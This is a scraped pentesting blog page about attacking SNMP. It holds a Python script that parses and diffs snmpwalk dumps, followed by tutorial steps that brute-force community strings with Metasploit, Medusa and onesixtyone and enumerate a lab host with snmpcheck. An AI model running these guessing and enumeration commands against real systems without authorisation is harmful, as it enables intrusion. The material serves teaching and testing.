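# Windows-specific MIB subtrees listed in the post (OID -> meaning).
MIB_SUBTREES = {
    "users": "1.3.6.1.4.1.77.1.2.25",
    "processes": "1.3.6.1.2.1.25.4.2.1.2",
    "process_paths": "1.3.6.1.2.1.25.4.2.1.4",
    "storage": "1.3.6.1.2.1.25.2.3.1.4",
    "software": "1.3.6.1.2.1.25.6.3.1.2",
    "tcp_ports": "1.3.6.1.2.1.6.13.1.3",
}

# Constructed sample of "snmpwalk -v1 -c <community> <host>" output as net-snmp
# prints it without MIB files loaded (OIDs appear as "iso.3.6.1...").
# Every value below is made up for this example.
SAMPLE_BEFORE = """\
iso.3.6.1.2.1.1.1.0 = STRING: "Hardware: x86 Family 6 - Software: Windows Version 5.1"
iso.3.6.1.2.1.1.3.0 = Timeticks: (1201) 0:00:12.01
iso.3.6.1.2.1.1.5.0 = STRING: "bhati"
iso.3.6.1.2.1.6.13.1.3.0.0.0.0.135.0.0.0.0.0 = INTEGER: 135
iso.3.6.1.2.1.6.13.1.3.0.0.0.0.445.0.0.0.0.0 = INTEGER: 445
iso.3.6.1.2.1.25.4.2.1.2.1 = STRING: "System Idle Process"
iso.3.6.1.2.1.25.4.2.1.2.4 = STRING: "System"
iso.3.6.1.2.1.25.4.2.1.2.520 = STRING: "snmp.exe"
iso.3.6.1.2.1.25.6.3.1.2.1 = STRING: "WebFldrs XP"
iso.3.6.1.4.1.77.1.2.25.1.1.5.71.117.101.115.116 = STRING: "Guest"
iso.3.6.1.4.1.77.1.2.25.1.1.5.98.104.97.116.105 = STRING: "bhati"
"""

# The same host walked again after the snmpset shown in the post: sysName has
# been rewritten, and the uptime counter has (as always) moved on.
SAMPLE_AFTER = SAMPLE_BEFORE.replace(
    'iso.3.6.1.2.1.1.5.0 = STRING: "bhati"',
    'iso.3.6.1.2.1.1.5.0 = STRING: "SomeOneWasHere"',
).replace("(1201) 0:00:12.01", "(9876) 0:01:38.76")

# Subtrees that legitimately differ between two walks (sysUpTime here; add
# interface counters and the like for real devices) so they never raise an alert.
VOLATILE_PREFIXES = ("1.3.6.1.2.1.1.3",)

LINE_RE = re.compile(r"^(?P<oid>\S+)\s*=\s*(?:(?P<type>[A-Za-z0-9 -]+):\s*)?(?P<value>.*)$")


def normalise_oid(oid: str) -> str:
    """Turn 'iso.3.6.1...' or '.1.3.6.1...' into plain dotted numeric '1.3.6.1...'."""
    oid = oid.strip()
    if oid.startswith("iso."):
        oid = "1." + oid[len("iso."):]
    return oid.lstrip(".")


def parse_snmpwalk(text: str) -> Dict[str, str]:
    """Map each numeric OID in a walk dump to its value (surrounding quotes removed).
    Continuation lines of multi-line values and symbolic OIDs (MIBs loaded) are skipped."""
    walk: Dict[str, str] = {}
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        oid = normalise_oid(m.group("oid"))
        if not all(part.isdigit() for part in oid.split(".")):
            continue
        value = m.group("value").strip()
        if len(value) >= 2 and value[0] == value[-1] == '"':
            value = value[1:-1]
        walk[oid] = value
    return walk


def subtree(walk: Dict[str, str], prefix: str) -> List[Tuple[str, str]]:
    """(oid, value) pairs under `prefix`, in numeric OID order (not lexical)."""
    prefix = normalise_oid(prefix)
    hits = [(o, v) for o, v in walk.items() if o == prefix or o.startswith(prefix + ".")]
    return sorted(hits, key=lambda ov: [int(x) for x in ov[0].split(".")])


def diff_walks(before: Dict[str, str], after: Dict[str, str], ignore=VOLATILE_PREFIXES):
    """Compare two captures: returns (added, removed, changed), changed as oid -> (old, new)."""
    def volatile(oid: str) -> bool:
        return any(oid == p or oid.startswith(p + ".") for p in ignore)
    added = {o: v for o, v in after.items() if o not in before and not volatile(o)}
    removed = {o: v for o, v in before.items() if o not in after and not volatile(o)}
    changed = {o: (before[o], after[o]) for o in before
               if o in after and before[o] != after[o] and not volatile(o)}
    return added, removed, changed


if __name__ == "__main__":
    base = parse_snmpwalk(SAMPLE_BEFORE)
    for name, oid in MIB_SUBTREES.items():
        print(f"{name:14s} {[v for _, v in subtree(base, oid)]}")
    added, removed, changed = diff_walks(base, parse_snmpwalk(SAMPLE_AFTER))
    for oid, (old, new) in changed.items():
        print(f"CHANGED {oid}: {old!r} -> {new!r}")
```

Feed it real dumps with `parse_snmpwalk(open("snmpout.txt").read())`; if your snmpwalk has MIB files loaded, re-run it with `-On` so OIDs come out numeric.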
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<b>B) SNMPCHECK</b></div>
<div class="separator" style="clear: both; text-align: left;">
<b><br /></b></div>
<div class="separator" style="clear: both; text-align: left;">
<b>snmpcheck </b>will uncover important information about the target machine using the community string "mike" that we found.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<b>snmpcheck.rb -c mike 192.168.131.135</b></div>
<div class="separator" style="clear: both; text-align: left;">
<b><br /></b></div>
<div class="separator" style="clear: both; text-align: left;">
If you get an error while running this command, see the help output of snmpcheck (run it with -h); your version might be older or newer and use different options.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhS9tLaisMTBmORAj5uIcFrgh5wdPPoH6ENQRD_hF6IUjsTh5vG6rd-A6rnSrKgFNnwgyYIrwOlfngSu4xkgHSsQzFAi5gRVTCWyqtZzeGAIpJ_pC0mDClY4ltlSBa-gmYbQSTBoPHMjxM/s1600/Screen+Shot+2017-04-09+at+11.40.43+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="424" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhS9tLaisMTBmORAj5uIcFrgh5wdPPoH6ENQRD_hF6IUjsTh5vG6rd-A6rnSrKgFNnwgyYIrwOlfngSu4xkgHSsQzFAi5gRVTCWyqtZzeGAIpJ_pC0mDClY4ltlSBa-gmYbQSTBoPHMjxM/s640/Screen+Shot+2017-04-09+at+11.40.43+PM.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<b>C) Metasploit</b></div>
<div class="separator" style="clear: both; text-align: left;">
<b><br /></b></div>
<div class="separator" style="clear: both; text-align: left;">
We can obtain the same information using Metasploit auxiliary modules.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<b>auxiliary/scanner/snmp/snmp_enum</b></div>
<div class="separator" style="clear: both; text-align: left;">
<b><br /></b></div>
<div class="separator" style="clear: both; text-align: left;">
Fill in the required values.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgp5qePAjn9iIynpY6YiAbg_9OKNYGCqgnxYNxXeaAfuC6fyaiE_PIs7ZjXgza521hUgqkSvhPNeE88vtcI4hHCiTGzYY-0kbMGjivMqofGBxgnOWo9VBrb0HiXj48baUqee26arN1LU9M/s1600/Screen+Shot+2017-04-09+at+11.47.17+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="284" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgp5qePAjn9iIynpY6YiAbg_9OKNYGCqgnxYNxXeaAfuC6fyaiE_PIs7ZjXgza521hUgqkSvhPNeE88vtcI4hHCiTGzYY-0kbMGjivMqofGBxgnOWo9VBrb0HiXj48baUqee26arN1LU9M/s640/Screen+Shot+2017-04-09+at+11.47.17+PM.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<b><br /></b></div>
<div class="separator" style="clear: both; text-align: left;">
Now just type "run" and you will see plenty of information from our target machine.</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUwBISlctcxf729eCy8SIhlGpKFZaTxupKzP143FarZ_mPSO3apxGfkgXqnbGuZ5Sji3Mmc2WRIxtKYEV6NpUlZXf11HMMOagQ0VeUYYyFyqyN82bfLlzLo2XMvBFqup3t4YbVOjvgOd8/s1600/Screen+Shot+2017-04-09+at+11.48.10+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="598" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUwBISlctcxf729eCy8SIhlGpKFZaTxupKzP143FarZ_mPSO3apxGfkgXqnbGuZ5Sji3Mmc2WRIxtKYEV6NpUlZXf11HMMOagQ0VeUYYyFyqyN82bfLlzLo2XMvBFqup3t4YbVOjvgOd8/s640/Screen+Shot+2017-04-09+at+11.48.10+PM.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifZpLDmUzhB3eDKs_OXzexKr2SIok5m-jkcKd-LojT4Szd_-kynE_Q0Xfcu1wAmCoarmtRsQj3Zu-cyh5nSo6KxZVGXfb-waX4hBALU9gemFylguqqkFHGI-uHKmbLYNrBBIVjTDvPcsY/s1600/Screen+Shot+2017-04-09+at+11.48.27+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" height="338" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifZpLDmUzhB3eDKs_OXzexKr2SIok5m-jkcKd-LojT4Szd_-kynE_Q0Xfcu1wAmCoarmtRsQj3Zu-cyh5nSo6KxZVGXfb-waX4hBALU9gemFylguqqkFHGI-uHKmbLYNrBBIVjTDvPcsY/s640/Screen+Shot+2017-04-09+at+11.48.27+PM.png" width="640" /></a><br />
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div>
<br /></div>
<div style="text-align: center;">
<br /></div>
</div>
Narendra Bhatihttp://www.blogger.com/profile/15834240919754131768noreply@blogger.com0tag:blogger.com,1999:blog-3462277729309057123.post-38722817281436083592017-04-10T00:23:00.000+05:302017-04-11T16:37:36.754+05:30Hacking SNMP Service Part 1 - The Post Exploitation : Attacking Network - Network Pentesting<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: Times; font-size: medium; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: normal; letter-spacing: normal; orphans: 2; text-align: center; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;">
</div>
<br />
<div style="text-align: left; text-indent: 0px;">
<div class="separator" style="clear: both; color: black; font-family: times; font-size: medium; font-style: normal; font-weight: normal; letter-spacing: normal; margin: 0px; text-align: left; text-transform: none; white-space: normal; word-spacing: 0px;">
<b><br /></b></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4faJH4HPssPfJiG9vSDERsFxCt-zCIizxckjGdJA0E58xD7Dcb89gfiiv-sJPQmgGhDzQvhk2qsGm97iWgfRDvDJ3tQb7YeJa4BkO3Lu3r9Z_u49fWeBB-ZQjgUshz3FxRAr6qQuxoGI/s1600/Screen+Shot+2017-04-09+at+10.51.11+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="190" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4faJH4HPssPfJiG9vSDERsFxCt-zCIizxckjGdJA0E58xD7Dcb89gfiiv-sJPQmgGhDzQvhk2qsGm97iWgfRDvDJ3tQb7YeJa4BkO3Lu3r9Z_u49fWeBB-ZQjgUshz3FxRAr6qQuxoGI/s640/Screen+Shot+2017-04-09+at+10.51.11+PM.png" width="640" /></a></div>
<div class="separator" style="clear: both; color: black; font-family: times; font-size: medium; font-style: normal; font-weight: normal; letter-spacing: normal; margin: 0px; text-align: center; text-transform: none; white-space: normal; word-spacing: 0px;">
<b><br /></b></div>
<h2 style="clear: both; margin: 0px; text-align: center;">
<span style="font-family: "times";"><b>Hacking SNMP Service Part 1 - The Post Exploitation : Attacking Network - Network Pentesting</b></span></h2>
<div class="separator" style="clear: both; color: black; font-family: times; font-size: medium; font-style: normal; font-weight: normal; letter-spacing: normal; margin: 0px; text-align: left; text-transform: none; white-space: normal; word-spacing: 0px;">
<b><br /></b></div>
<div class="separator" style="clear: both; color: black; font-family: times; font-size: medium; font-style: normal; font-weight: normal; letter-spacing: normal; margin: 0px; text-align: left; text-transform: none; white-space: normal; word-spacing: 0px;">
<b>SNMP (Simple Network Management Protocol)</b></div>
<div class="separator" style="clear: both; color: black; font-family: times; font-size: medium; font-style: normal; font-weight: normal; letter-spacing: normal; margin: 0px; text-align: left; text-transform: none; white-space: normal; word-spacing: 0px;">
<b><br /></b></div>
<div class="separator" style="clear: both; color: black; font-family: times; font-size: medium; font-style: normal; font-weight: normal; letter-spacing: normal; margin: 0px; text-align: left; text-transform: none; white-space: normal; word-spacing: 0px;">
<span style="background-color: white; color: #222222; font-family: "arial" , sans-serif; font-size: 16px;">Simple Network Management Protocol (</span><b style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 16px;">SNMP</b><span style="background-color: white; color: #222222; font-family: "arial" , sans-serif; font-size: 16px;">) is a popular protocol for network management. It is used for collecting information from, and configuring, network devices, such as servers, printers, hubs, switches, and routers on an Internet Protocol (IP) network.</span></div>
<div class="separator" style="clear: both; color: black; font-family: times; font-size: medium; font-style: normal; font-weight: normal; letter-spacing: normal; margin: 0px; text-align: left; text-transform: none; white-space: normal; word-spacing: 0px;">
<span style="background-color: white; color: #222222; font-family: "arial" , sans-serif; font-size: 16px;"><br /></span></div>
<div class="separator" style="clear: both; color: black; font-family: times; font-size: medium; font-style: normal; font-weight: normal; letter-spacing: normal; margin: 0px; text-align: left; text-transform: none; white-space: normal; word-spacing: 0px;">
<span style="background-color: white; color: #222222; font-family: "arial" , sans-serif; font-size: 16px;">Being so widely deployed, SNMP can also be abused by an attacker to compromise services and IT infrastructure, which we will cover later.</span></div>
<div class="separator" style="clear: both; color: black; font-family: times; font-size: medium; font-style: normal; font-weight: normal; letter-spacing: normal; margin: 0px; text-align: left; text-transform: none; white-space: normal; word-spacing: 0px;">
<span style="background-color: white; color: #222222; font-family: "arial" , sans-serif; font-size: 16px;"><br /></span></div>
<div class="separator" style="clear: both; color: black; font-family: times; font-size: medium; font-style: normal; font-weight: normal; letter-spacing: normal; margin: 0px; text-align: left; text-transform: none; white-space: normal; word-spacing: 0px;">
<br /></div>
<div class="separator" style="clear: both; color: black; font-family: times; font-size: medium; font-style: normal; letter-spacing: normal; margin: 0px; text-align: left; text-transform: none; white-space: normal; word-spacing: 0px;">
<span style="font-weight: normal;">Now we will see how </span><b>we can brute force the SNMP service's community strings.</b></div>
<div class="separator" style="clear: both; color: black; font-family: times; font-size: medium; font-style: normal; letter-spacing: normal; margin: 0px; text-align: left; text-transform: none; white-space: normal; word-spacing: 0px;">
<b><br /></b></div>
<div class="separator" style="clear: both; color: black; font-family: times; font-size: medium; font-style: normal; letter-spacing: normal; margin: 0px; text-align: left; text-transform: none; white-space: normal; word-spacing: 0px;">
<b><br /></b></div>
<div class="separator" style="clear: both; font-family: times;">
<span style="background-color: white; color: #222222; font-family: "arial" , sans-serif; font-size: 16px;"><b>But Why Crack SNMP Community Strings</b></span></div>
<div class="separator" style="clear: both; font-family: times;">
<span style="background-color: white; color: #222222; font-family: "arial" , sans-serif; font-size: 16px;"><b><br /></b></span></div>
<div class="separator" style="clear: both; font-family: times;">
<span style="background-color: white; color: #222222; font-family: "arial" , sans-serif; font-size: 16px;"><span style="color: #333333; font-family: "hind vadodara" , sans-serif; font-size: 14px;">The SNMP Read-Only Community String is like a user id or password. It is sent along with each SNMP Get-Request and allows (or denies) access to a router's or other device's statistics. If the community string is correct, the device responds with the requested information. If the community string is incorrect, the device simply ignores the request and does not respond.</span></span></div>
<div class="separator" style="clear: both; font-family: times;">
<span style="background-color: white; color: #222222; font-family: "arial" , sans-serif; font-size: 16px;"><span style="color: #333333; font-family: "hind vadodara" , sans-serif; font-size: 14px;"><br /></span></span></div>
<div class="separator" style="clear: both; font-family: times;">
<span style="background-color: white; color: #222222; font-family: "arial" , sans-serif; font-size: 16px;"><span style="color: #333333; font-family: "hind vadodara" , sans-serif; font-size: 14px;"><br /></span></span></div>
<div style="clear: both; text-align: left;">
<span style="color: #333333; font-family: "hind vadodara" , sans-serif; font-size: small;"><span style="background-color: white;"><b>What We Can Do With Community Strings</b></span></span></div>
<div class="separator" style="clear: both;">
<span style="color: #333333; font-family: "hind vadodara" , sans-serif;"><span style="background-color: white; font-size: 14px;"><b><br /></b></span></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "times";">The default community strings are "public" and "private", and a community string is granted either "ro" (read only) or "rw" (read and write) access.</span></div>
<div class="separator" style="clear: both;">
As the names indicate, read only means the user can only read information, while read and write means the user can also write/update the information exposed through SNMP.</div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both;">
</div>
<a name='more'></a><br />
<br />
<div class="separator" style="clear: both;">
<b>What Is MIB in SNMP</b></div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both;">
The SNMP Management Information Base (MIB) is a database containing information usually related to network management. The database is organized like a tree, where branches represent different organizations or network functions. The leaves of the tree (final endpoints) correspond to specific variable values that can then be accessed, and probed, by an external user. To read more about the MIB tree, refer to the following:</div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both;">
<a href="http://publib.boulder.ibm.com/infocenter/pseries/v5r3/index.jsp?topic=/com.ibm.aix.progcomm/doc/progcomc/mib.htm">http://publib.boulder.ibm.com/infocenter/pseries/v5r3/index.jsp?topic=/com.ibm.aix.progcomm/doc/progcomc/mib.htm</a></div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both; font-family: times;">
<br /></div>
<div class="separator" style="clear: both; font-family: times;">
<br /></div>
<div class="separator" style="clear: both; color: black; font-family: times; font-size: medium; font-style: normal; font-weight: normal; letter-spacing: normal; margin: 0px; text-align: left; text-transform: none; white-space: normal; word-spacing: 0px;">
Since SNMP runs over UDP, don't forget to perform a UDP-based scan in a network pentest.</div>
<div class="separator" style="clear: both; color: black; font-family: times; font-size: medium; font-style: normal; font-weight: normal; letter-spacing: normal; margin: 0px; text-align: left; text-transform: none; white-space: normal; word-spacing: 0px;">
<br /></div>
<div class="separator" style="clear: both; color: black; font-family: times; font-size: medium; font-style: normal; font-weight: normal; letter-spacing: normal; margin: 0px; text-align: left; text-transform: none; white-space: normal; word-spacing: 0px;">
<b>A) Metasploit</b></div>
<div class="separator" style="clear: both; color: black; font-family: times; font-size: medium; font-style: normal; font-weight: normal; letter-spacing: normal; margin: 0px; text-align: left; text-transform: none; white-space: normal; word-spacing: 0px;">
<b><br /></b></div>
<div class="separator" style="clear: both; color: black; font-family: times; font-size: medium; font-style: normal; font-weight: normal; letter-spacing: normal; margin: 0px; text-align: left; text-transform: none; white-space: normal; word-spacing: 0px;">
For SNMP use <b>auxiliary/scanner/snmp/snmp_login </b></div>
<div class="separator" style="clear: both; color: black; font-family: times; font-size: medium; font-style: normal; font-weight: normal; letter-spacing: normal; margin: 0px; text-align: left; text-transform: none; white-space: normal; word-spacing: 0px;">
<b><br /></b></div>
<div class="separator" style="clear: both; color: black; font-family: times; font-size: medium; font-style: normal; font-weight: normal; letter-spacing: normal; margin: 0px; text-align: center; text-transform: none; white-space: normal; word-spacing: 0px;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAKquiNtAl9p_XgeNgnHefYiM9eSb5ROzjY_Lcb1VT6VuSIAt3doyBcqpVoiM5PBmKq9bVKWoWsOYg7agZBd6fS4Uf4AlH35EUyIWwqtLfR6_iJCWBxqzahtaonFfKJmr9viYgxnW6pqI/s1600/Screen+Shot+2017-04-09+at+6.46.36+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="276" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAKquiNtAl9p_XgeNgnHefYiM9eSb5ROzjY_Lcb1VT6VuSIAt3doyBcqpVoiM5PBmKq9bVKWoWsOYg7agZBd6fS4Uf4AlH35EUyIWwqtLfR6_iJCWBxqzahtaonFfKJmr9viYgxnW6pqI/s640/Screen+Shot+2017-04-09+at+6.46.36+PM.png" style="cursor: move;" width="640" /></a></div>
<div class="separator" style="clear: both; color: black; font-family: times; font-size: medium; font-style: normal; font-weight: normal; letter-spacing: normal; margin: 0px; text-align: center; text-transform: none; white-space: normal; word-spacing: 0px;">
<b><br /></b></div>
<div class="separator" style="clear: both; color: black; font-family: times; font-size: medium; font-style: normal; letter-spacing: normal; margin: 0px; text-align: left; text-transform: none; white-space: normal; word-spacing: 0px;">
Set the following parameters and hit <b style="font-weight: normal;">run</b>; you can see that Metasploit has succeeded and the SNMP community string is "<b>mike</b>".</div>
<div class="separator" style="clear: both; color: black; font-family: times; font-size: medium; font-style: normal; font-weight: normal; letter-spacing: normal; margin: 0px; text-align: left; text-transform: none; white-space: normal; word-spacing: 0px;">
<br /></div>
<div class="separator" style="clear: both; color: black; font-family: times; font-size: medium; font-style: normal; font-weight: normal; letter-spacing: normal; margin: 0px; text-align: center; text-transform: none; white-space: normal; word-spacing: 0px;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1cwxBHmfwqN_woXggjaq9AHwBJluYOW0wAVTvzf8x9lvLxwhOHLjVdPYyjfLeY_DNVyvifD-j0Q27tJruxCt7GhH4oD2cWrgwK5Rr6qnbLOHKErtBYLc-fk7Vn-pIR0RcEQUgpSwq-bw/s1600/Screen+Shot+2017-04-09+at+6.51.10+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="194" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1cwxBHmfwqN_woXggjaq9AHwBJluYOW0wAVTvzf8x9lvLxwhOHLjVdPYyjfLeY_DNVyvifD-j0Q27tJruxCt7GhH4oD2cWrgwK5Rr6qnbLOHKErtBYLc-fk7Vn-pIR0RcEQUgpSwq-bw/s640/Screen+Shot+2017-04-09+at+6.51.10+PM.png" style="cursor: move;" width="640" /></a></div>
<div class="separator" style="clear: both; color: black; font-family: times; font-size: medium; font-style: normal; font-weight: normal; letter-spacing: normal; margin: 0px; text-align: left; text-transform: none; white-space: normal; word-spacing: 0px;">
<br /></div>
<div style="color: black; font-family: times; font-size: medium; font-style: normal; font-weight: normal; letter-spacing: normal; text-transform: none; white-space: normal; word-spacing: 0px;">
<br /></div>
<div class="separator" style="clear: both; color: black; font-family: times; font-size: medium; font-style: normal; font-weight: normal; letter-spacing: normal; margin: 0px; text-align: left; text-transform: none; white-space: normal; word-spacing: 0px;">
Personally, I would recommend Metasploit for SNMP community string cracking, because it takes less time compared to other tools.</div>
<div class="separator" style="clear: both; color: black; font-family: times; font-size: medium; font-style: normal; font-weight: normal; letter-spacing: normal; margin: 0px; text-align: left; text-transform: none; white-space: normal; word-spacing: 0px;">
<br /></div>
<div class="separator" style="clear: both; color: black; font-family: times; font-size: medium; font-style: normal; letter-spacing: normal; margin: 0px; text-align: left; text-transform: none; white-space: normal; word-spacing: 0px;">
<b>B) Medusa</b></div>
<div class="separator" style="clear: both; color: black; font-family: times; font-size: medium; font-style: normal; letter-spacing: normal; margin: 0px; text-align: left; text-transform: none; white-space: normal; word-spacing: 0px;">
<b><br /></b></div>
<div class="separator" style="clear: both; color: black; font-family: times; font-size: medium; font-style: normal; letter-spacing: normal; margin: 0px; text-align: left; text-transform: none; white-space: normal; word-spacing: 0px;">
As Medusa has great speed, it is also very useful for cracking SNMP community strings.</div>
<div class="separator" style="clear: both; color: black; font-family: times; font-size: medium; font-style: normal; letter-spacing: normal; margin: 0px; text-align: left; text-transform: none; white-space: normal; word-spacing: 0px;">
<b><br /></b></div>
<div class="separator" style="clear: both; margin: 0px; text-align: left;">
<span style="font-family: "times";"><b>medusa -h 192.168.131.135 -u admin -P Desktop/demo/wordlist -M snmp</b></span></div>
<div class="separator" style="clear: both; margin: 0px; text-align: left;">
<span style="font-family: "times";">SNMP has no user, so "-u admin" is not actually used, but Medusa requires this value, so we supply it to satisfy the requirement.</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKT1Zdg7hxipQiLZalq8YdBA-IW9IGBOCEDRAsrWwSoIh-iS9EpC4hZdEXoXmWuoN6T8Hywph3v0qdjVRnjHS96_ReiuGQ4wsxs-2JMQQMpfr9JspZuGZX5Q9MnCYx6-rOxnOoEuAj3gE/s1600/Screen+Shot+2017-04-09+at+10.17.53+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="46" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKT1Zdg7hxipQiLZalq8YdBA-IW9IGBOCEDRAsrWwSoIh-iS9EpC4hZdEXoXmWuoN6T8Hywph3v0qdjVRnjHS96_ReiuGQ4wsxs-2JMQQMpfr9JspZuGZX5Q9MnCYx6-rOxnOoEuAj3gE/s640/Screen+Shot+2017-04-09+at+10.17.53+PM.png" width="640" /></a></div>
<div class="separator" style="clear: both; margin: 0px; text-align: left;">
<span style="font-family: "times";"><br /></span></div>
<div class="separator" style="clear: both; margin: 0px; text-align: left;">
<span style="font-family: "times";"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4EHMiX1pFOINkGOT2ZYC6RjPtoAPoaq_AHZBq5nzrg-4CoimKejWc0A4EQdCuQEOKdbIihCf6fmK6uZUnZZrkbqwwMZtF98Syo95XredqaOoIB81ymcIxth6twPHs9qzl8Tbkcj16Qv4/s1600/Screen+Shot+2017-04-09+at+10.17.43+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="70" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4EHMiX1pFOINkGOT2ZYC6RjPtoAPoaq_AHZBq5nzrg-4CoimKejWc0A4EQdCuQEOKdbIihCf6fmK6uZUnZZrkbqwwMZtF98Syo95XredqaOoIB81ymcIxth6twPHs9qzl8Tbkcj16Qv4/s640/Screen+Shot+2017-04-09+at+10.17.43+PM.png" width="640" /></a></div>
<div class="separator" style="clear: both; margin: 0px; text-align: left;">
<span style="font-family: "times";"><br /></span></div>
<div class="separator" style="clear: both; color: black; font-family: times; font-size: medium; font-style: normal; font-weight: normal; letter-spacing: normal; margin: 0px; text-align: left; text-transform: none; white-space: normal; word-spacing: 0px;">
<br /></div>
<div class="separator" style="clear: both; color: black; font-family: times; font-size: medium; font-style: normal; font-weight: normal; letter-spacing: normal; margin: 0px; text-align: left; text-transform: none; white-space: normal; word-spacing: 0px;">
And yes, Medusa found the valid community string: "mike".</div>
<div class="separator" style="clear: both; color: black; font-family: times; font-size: medium; font-style: normal; font-weight: normal; letter-spacing: normal; margin: 0px; text-align: left; text-transform: none; white-space: normal; word-spacing: 0px;">
<br /></div>
<div class="separator" style="clear: both; color: black; font-family: times; font-size: medium; font-style: normal; letter-spacing: normal; margin: 0px; text-align: left; text-transform: none; white-space: normal; word-spacing: 0px;">
<b>C) onesixtyone</b></div>
<div class="separator" style="clear: both; color: black; font-family: times; font-size: medium; font-style: normal; letter-spacing: normal; margin: 0px; text-align: left; text-transform: none; white-space: normal; word-spacing: 0px;">
<br /></div>
<div class="separator" style="clear: both; color: black; font-family: times; font-size: medium; font-style: normal; letter-spacing: normal; margin: 0px; text-align: left; text-transform: none; white-space: normal; word-spacing: 0px;">
<b>onesixtyone -c password 192.168.131.135</b></div>
<div class="separator" style="clear: both; color: black; font-family: times; font-size: medium; font-style: normal; letter-spacing: normal; margin: 0px; text-align: left; text-transform: none; white-space: normal; word-spacing: 0px;">
<b><br /></b></div>
<div class="separator" style="clear: both; color: black; font-family: times; font-size: medium; font-style: normal; letter-spacing: normal; margin: 0px; text-align: left; text-transform: none; white-space: normal; word-spacing: 0px;">
onesixtyone is another tool that tries to guess the SNMP community string using dictionary-based attempts.</div>
<div class="separator" style="clear: both; color: black; font-family: times; font-size: medium; font-style: normal; letter-spacing: normal; margin: 0px; text-align: left; text-transform: none; white-space: normal; word-spacing: 0px;">
<br /></div>
<div class="separator" style="clear: both; color: black; font-family: times; font-size: medium; font-style: normal; letter-spacing: normal; margin: 0px; text-align: left; text-transform: none; white-space: normal; word-spacing: 0px;">
As we can see below, it has identified that "mike" is a valid community string.</div>
<div class="separator" style="clear: both; color: black; font-family: times; font-size: medium; font-style: normal; letter-spacing: normal; margin: 0px; text-align: left; text-transform: none; white-space: normal; word-spacing: 0px;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
